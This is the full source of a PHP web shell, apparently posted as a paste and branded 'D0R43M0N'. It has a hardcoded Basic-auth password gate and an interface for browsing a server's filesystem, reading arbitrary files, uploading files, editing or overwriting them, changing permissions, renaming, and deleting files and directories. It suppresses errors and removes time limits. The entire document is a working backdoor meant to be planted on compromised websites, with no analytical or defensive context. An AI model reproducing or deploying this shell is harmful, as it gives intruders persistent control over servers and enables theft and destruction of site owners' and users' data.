Sir.neptune

1.    
2. <?php
3. // --- pop-up
4.  
5. $user = "Doraemon";
6.  
7. $pass = "OpikGans";
8.  
9.  if (($_SERVER["PHP_AUTH_USER"] != $user) || (($_SERVER["PHP_AUTH_PW"]) != $pass))
10.  
11.  {
12.  
13.   header("WWW-Authenticate: Basic realm=\"Doraemon was here\"");
14.  
15.   header("HTTP/1.0 401 Unauthorized");
16.  
17.   exit();
18.  
19.  }
20.  
21.  
22. // --- php shell
23. set_time_limit(0);
24. error_reporting(0);
25.  
26. if(get_magic_quotes_gpc()){
27. foreach($_POST as $key=>$value){
28. $_POST[$key] = stripslashes($value);
29. }
30. }
31. echo '<!DOCTYPE HTML>
32. <HTML>
33. <HEAD>
34. <link href="" rel="stylesheet" type="text/css">
35. <title></title>
36. <style>
37. body{
38. font-family: "Rye", cursive;
39. background-color: black;
40. text-shadow:0px 0px 1px #757575;
41. }
42. #content tr:hover{
43. background-color: black;
44. text-shadow:0px 0px 10px #fff;
45. }
46. #content .first{
47. background-color:  red;
48. }
49. #content .first:hover{
50. background-color:  red;
51. text-shadow:0px 0px 1px #757575;
52. }
53. table{
54. border: 1px #000000 dotted;
55. }
56. H1{
57. font-family: "Rye", cursive;
58. }
59. a{
60. color: red;
61. text-decoration: none;
62. }
63. a:hover{
64. color: red;
65. text-shadow:0px 0px 10px #ffffff;
66. }
67. input,select,textarea{
68. border: 1px #000000 solid;
69. -moz-border-radius: 5px;
70. -webkit-border-radius:5px;
71. border-radius:5px;
72. }
73. </style>
74. </HEAD>
75. <BODY>
76. <H1><center>[#] D0R43M0N [#] </center></H1>
77. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
78. <tr><td>Current Path : ';
79. if(isset($_GET['path'])){
80. $path = $_GET['path'];
81. }else{
82. $path = getcwd();
83. }
84. $path = str_replace('\\','/',$path);
85. $paths = explode('/',$path);
86.  
87. foreach($paths as $id=>$pat){
88. if($pat == '' && $id == 0){
89. $a = true;
90. echo '<a href="?path=/">/</a>';
91. continue;
92. }
93. if($pat == '') continue;
94. echo '<a href="?path=';
95. for($i=0;$i<=$id;$i++){
96. echo "$paths[$i]";
97. if($i != $id) echo "/";
98. }
99. echo '">'.$pat.'</a>/';
100. }
101. echo '</td></tr><tr><td>';
102. if(isset($_FILES['file'])){
103. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
104. echo '<font color="green">File Upload Done Mas ~_^ .</font><br />';
105. }else{
106. echo '<font color="red">File Upload Error ~_~.</font><br />';
107. }
108. }
109. echo '<form enctype="multipart/form-data" method="POST">
110. Upload File : <input type="file" name="file" />
111. <input type="submit" value="upload" />
112. </form>
113. </td></tr>';
114. if(isset($_GET['filesrc'])){
115. echo "<tr><td>Current File : ";
116. echo $_GET['filesrc'];
117. echo '</tr></td></table><br />';
118. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
119. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
120. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
121. if($_POST['opt'] == 'chmod'){
122. if(isset($_POST['perm'])){
123. if(chmod($_POST['path'],$_POST['perm'])){
124. echo '<font color="green">Change Permission Done.</font><br />';
125. }else{
126. echo '<font color="red">Change Permission Error.</font><br />';
127. }
128. }
129. echo '<form method="POST">
130. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
131. <input type="hidden" name="path" value="'.$_POST['path'].'">
132. <input type="hidden" name="opt" value="chmod">
133. <input type="submit" value="Go" />
134. </form>';
135. }elseif($_POST['opt'] == 'rename'){
136. if(isset($_POST['newname'])){
137. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
138. echo '<font color="green">Change Name Done.</font><br />';
139. }else{
140. echo '<font color="red">Change Name Error.</font><br />';
141. }
142. $_POST['name'] = $_POST['newname'];
143. }
144. echo '<form method="POST">
145. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
146. <input type="hidden" name="path" value="'.$_POST['path'].'">
147. <input type="hidden" name="opt" value="rename">
148. <input type="submit" value="Go" />
149. </form>';
150. }elseif($_POST['opt'] == 'edit'){
151. if(isset($_POST['src'])){
152. $fp = fopen($_POST['path'],'w');
153. if(fwrite($fp,$_POST['src'])){
154. echo '<font color="green">Edit File Done ~_^.</font><br />';
155. }else{
156. echo '<font color="red">Edit File Error ~_~.</font><br />';
157. }
158. fclose($fp);
159. }
160. echo '<form method="POST">
161. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
162. <input type="hidden" name="path" value="'.$_POST['path'].'">
163. <input type="hidden" name="opt" value="edit">
164. <input type="submit" value="Go" />
165. </form>';
166. }
167. echo '</center>';
168. }else{
169. echo '</table><br /><center>';
170. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
171. if($_POST['type'] == 'dir'){
172. if(rmdir($_POST['path'])){
173. echo '<font color="green">Delete Dir Done.</font><br />';
174. }else{
175. echo '<font color="red">Delete Dir Error.</font><br />';
176. }
177. }elseif($_POST['type'] == 'file'){
178. if(unlink($_POST['path'])){
179. echo '<font color="green">Delete File Done.</font><br />';
180. }else{
181. echo '<font color="red">Delete File Error.</font><br />';
182. }
183. }
184. }
185. echo '</center>';
186. $scandir = scandir($path);
187. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
188. <tr class="first">
189. <td><center>Name</center></td>
190. <td><center>Size</center></td>
191. <td><center>Permissions</center></td>
192. <td><center>Options</center></td>
193. </tr>';
194.  
195. foreach($scandir as $dir){
196. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
197. echo "<tr>
198. <td><a href=\"?path=$path/$dir\">$dir</a></td>
199. <td><center>--</center></td>
200. <td><center>";
201. if(is_writable("$path/$dir")) echo '<font color="green">';
202. elseif(!is_readable("$path/$dir")) echo '<font color="red">';
203. echo perms("$path/$dir");
204. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
205.  
206. echo "</center></td>
207. <td><center><form method=\"POST\" action=\"?option&path=$path\">
208. <select name=\"opt\">
209. <option value=\"\"></option>
210. <option value=\"delete\">Delete</option>
211. <option value=\"chmod\">Chmod</option>
212. <option value=\"rename\">Rename</option>
213. </select>
214. <input type=\"hidden\" name=\"type\" value=\"dir\">
215. <input type=\"hidden\" name=\"name\" value=\"$dir\">
216. <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
217. <input type=\"submit\" value=\">\" />
218. </form></center></td>
219. </tr>";
220. }
221. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
222. foreach($scandir as $file){
223. if(!is_file("$path/$file")) continue;
224. $size = filesize("$path/$file")/1024;
225. $size = round($size,3);
226. if($size >= 1024){
227. $size = round($size/1024,2).' MB';
228. }else{
229. $size = $size.' KB';
230. }
231.  
232. echo "<tr>
233. <td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
234. <td><center>".$size."</center></td>
235. <td><center>";
236. if(is_writable("$path/$file")) echo '<font color="green">';
237. elseif(!is_readable("$path/$file")) echo '<font color="red">';
238. echo perms("$path/$file");
239. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
240. echo "</center></td>
241. <td><center><form method=\"POST\" action=\"?option&path=$path\">
242. <select name=\"opt\">
243. <option value=\"\"></option>
244. <option value=\"delete\">Delete</option>
245. <option value=\"chmod\">Chmod</option>
246. <option value=\"rename\">Rename</option>
247. <option value=\"edit\">Edit</option>
248. </select>
249. <input type=\"hidden\" name=\"type\" value=\"file\">
250. <input type=\"hidden\" name=\"name\" value=\"$file\">
251. <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
252. <input type=\"submit\" value=\">\" />
253. </form></center></td>
254. </tr>";
255. }
256. echo '</table>
257. </div>';
258. }
259. echo '<br /><center> <font color="red"></font>, <font color="red"></font></center>
260. </BODY>
261. </HTML>';
262. function perms($file){
263. $perms = fileperms($file);
264.  
265. if (($perms & 0xC000) == 0xC000) {
266. // Socket
267. $info = 's';
268. } elseif (($perms & 0xA000) == 0xA000) {
269. // Symbolic Link
270. $info = 'l';
271. } elseif (($perms & 0x8000) == 0x8000) {
272. // Regular
273. $info = '-';
274. } elseif (($perms & 0x6000) == 0x6000) {
275. // Block special
276. $info = 'b';
277. } elseif (($perms & 0x4000) == 0x4000) {
278. // Directory
279. $info = 'd';
280. } elseif (($perms & 0x2000) == 0x2000) {
281. // Character special
282. $info = 'c';
283. } elseif (($perms & 0x1000) == 0x1000) {
284. // FIFO pipe
285. $info = 'p';
286. } else {
287. // Unknown
288. $info = 'u';
289. }
290.  
291. // Owner
292. $info .= (($perms & 0x0100) ? 'r' : '-');
293. $info .= (($perms & 0x0080) ? 'w' : '-');
294. $info .= (($perms & 0x0040) ?
295. (($perms & 0x0800) ? 's' : 'x' ) :
296. (($perms & 0x0800) ? 'S' : '-'));
297.  
298. // Group
299. $info .= (($perms & 0x0020) ? 'r' : '-');
300. $info .= (($perms & 0x0010) ? 'w' : '-');
301. $info .= (($perms & 0x0008) ?
302. (($perms & 0x0400) ? 's' : 'x' ) :
303. (($perms & 0x0400) ? 'S' : '-'));
304.  
305. // World
306. $info .= (($perms & 0x0004) ? 'r' : '-');
307. $info .= (($perms & 0x0002) ? 'w' : '-');
308. $info .= (($perms & 0x0001) ?
309. (($perms & 0x0200) ? 't' : 'x' ) :
310. (($perms & 0x0200) ? 'T' : '-'));
311.  
312. return $info;
313. }